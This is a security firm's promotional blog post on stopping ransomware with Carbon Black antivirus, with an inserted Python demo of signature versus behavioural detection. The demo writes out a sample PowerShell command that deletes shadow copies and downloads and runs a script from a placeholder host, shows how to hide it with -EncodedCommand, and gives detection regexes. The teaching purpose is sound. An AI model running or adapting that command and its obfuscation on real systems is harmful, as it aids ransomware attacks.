Stopping Ransomware Cold: Lessons from the Front Lines

At Schneider Downs, we are all too familiar with the costly impact ransomware attacks can have on organizations of all sizes and across all industries. Our cyber team continues to respond to countless incidents, helping our clients identify, contain, eradicate and recover from a wide variety of compromises, the most common, and most devastating, of which is ransomware.

In Q1 2020 the reported average ransom demand was $111,605, which is significantly lower than many of the demands our team has seen firsthand. The ransom amount also does not account for the harder-to-measure costs: reputational damage, business interruption, customer perception, forensics experts and legal fees, to name a few.

As incident responders, it’s our job to minimize the impact of these attacks. A crucial component is having effective solutions readily available for our clients when they need them most. When it comes to stopping ransomware in its tracks, our team trusts VMware Carbon Black, which is why one of our first steps in any ransomware engagement is to deploy Carbon Black to every endpoint as quickly as possible. If critical data and systems are being encrypted by threat actors, the existing antivirus clearly wasn’t cutting it and will likely be of little further help.

What’s the big deal with next-generation antivirus (NGAV)?

Traditional antivirus products rely on file signatures, essentially comparing each executable, attachment and web download against a list of known malware. Attackers have found that they can easily sidestep this type of solution by obfuscating their malicious code or by deploying “fileless” malware via Windows PowerShell or VBScript embedded in Office documents. These approaches either produce a file whose signature the antivirus does not recognize as malicious, or avoid file scanning entirely by running through a trusted interpreter and residing only in the endpoint’s runtime memory, or RAM.
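To make the signature-versus-behavior point concrete, here is an added example in Python. It is not part of the Schneider Downs post and is not Carbon Black code. It hashes a constructed PowerShell one-liner (the URL sits on the reserved .invalid domain, so nothing is ever fetched) against a hypothetical known-bad hash list, then re-encodes the same command with -EncodedCommand and shows that the hash lookup no longer matches while three simple, equally hypothetical behavioral rules still fire on the decoded command.

```python
"""Added example (not from the Schneider Downs post or from Carbon Black):
shows why a file-hash "signature" fails after trivial obfuscation of a
PowerShell one-liner, while a check on what the command does still fires.

Everything here is constructed for illustration: the sample command, the
hypothetical hash database and the detection rules. The URL uses the reserved
.invalid TLD so nothing is ever fetched; the sample text is never executed."""
import base64
import hashlib
import re

# Constructed sample: shadow-copy deletion (a common ransomware precursor)
# followed by download-and-execute. Inert text.
SAMPLE_SCRIPT = (
    "vssadmin delete shadows /all /quiet; "
    "Invoke-Expression (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/stage2.ps1')"
)

# Hypothetical signature database: SHA-256 of files already known to be bad.
KNOWN_BAD_HASHES = {hashlib.sha256(SAMPLE_SCRIPT.encode()).hexdigest()}


def signature_match(content: bytes) -> bool:
    """Traditional AV: exact hash lookup against the known-bad list."""
    return hashlib.sha256(content).hexdigest() in KNOWN_BAD_HASHES


def obfuscate(script: str) -> str:
    """What an attacker does: wrap the same script in -EncodedCommand.
    The behaviour is identical, but the bytes (and so the hash) are new."""
    encoded = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f"powershell.exe -NoP -W Hidden -EncodedCommand {encoded}"


# Hypothetical behavioural rules: regexes over the command line and its
# decoded form. A real NGAV keys on process, file and memory activity instead.
BEHAVIOUR_RULES = {
    "shadow_copy_deletion": re.compile(
        r"vssadmin\s+delete\s+shadows|wmic\s+shadowcopy\s+delete|Win32_ShadowCopy",
        re.I),
    "download_and_execute": re.compile(
        r"(Invoke-Expression|IEX)\b.*\b(DownloadString|DownloadFile|Invoke-WebRequest)",
        re.I),
    "encoded_command": re.compile(
        r"-(EncodedCommand|Enc|e)\b\s+[A-Za-z0-9+/=]{20,}", re.I),
}


def decode_encoded_command(cmdline: str) -> str:
    """Recover the plaintext of a -EncodedCommand argument, if present;
    otherwise (or if the payload is not valid base64/UTF-16LE) return the
    command line unchanged."""
    m = re.search(r"-(?:EncodedCommand|Enc|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def behaviour_hits(cmdline: str) -> list:
    """NGAV-style check: which rules fire on the raw or the decoded command."""
    hits = set()
    for text in (cmdline, decode_encoded_command(cmdline)):
        for name, rule in BEHAVIOUR_RULES.items():
            if rule.search(text):
                hits.add(name)
    return sorted(hits)


def classify(cmdline: str) -> dict:
    """Side-by-side verdict from the signature and the behavioural approach."""
    return {
        "signature_match": signature_match(cmdline.encode()),
        "behaviours": behaviour_hits(cmdline),
    }


if __name__ == "__main__":
    for label, cmd in (("original", SAMPLE_SCRIPT),
                       ("obfuscated", obfuscate(SAMPLE_SCRIPT))):
        print(label, classify(cmd))
```

Run it as a script to print both verdicts side by side: the original command matches the hash list and trips two behavioral rules; the base64-wrapped copy matches no hash at all yet trips three. The rules are deliberately crude, and a real NGAV evaluates process lineage, file, registry and memory activity rather than command-line regexes, but the principle is the same: key on what the code does, not on what its bytes happen to hash to.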

Carbon Black’s next-generation antivirus combines behavioral analytics with data-driven prevention technology and is certified to replace traditional antivirus, using predictive modeling to identify and stop known and unknown threats, including malware, “fileless” attacks and, of course, ransomware behavior. As incident responders, we also appreciate the endpoint detection and response (EDR) features, such as remote quarantine and rapid triage, for quick containment and analysis of malware.

As trusted cybersecurity advisors, we understand how frustrating it is to ask all the right questions, hire the smartest people, lock everything down, perform countless audits, remediate every finding, invest reasonably at every turn, and still fall victim to a ransomware attack because of a reliance on traditional antivirus products and their significant, yet poorly communicated, limitations.

The simple truth is that without a next-generation antivirus (NGAV) or endpoint detection and response (EDR) solution, your environment will remain susceptible to a modern ransomware attack. As countless incidents have taught us, an ounce of prevention is worth a pound of cure.

How Can Schneider Downs Help?

Our team can test the effectiveness of your existing products, offer guidance on which Carbon Black features make the most sense for your organization, and even provide pricing discounts through our incident response team’s partnership with VMware. As with any product, configuration is key: have a trusted advisor like us tune it, and run test payloads against it to validate that it actually blocks, rather than merely reports, the behaviors that matter to you. Just let us know how we can help.

To learn more about our team and capabilities, including our Ransomware Security Service visit our Cybersecurity Website or contact us at [email protected].

If you are experiencing or suspect an incident, our Incident Response Team is available around the clock at 1-800-993-8937.


Material discussed is meant for informational purposes only, and it is not to be construed as investment, tax, or legal advice. Please note that individual situations can vary. Therefore, this information should be relied upon when coordinated with individual professional advice.

© 2021 Schneider Downs. All rights-reserved. All content on this site is property of Schneider Downs unless otherwise noted and should not be used without written permission.
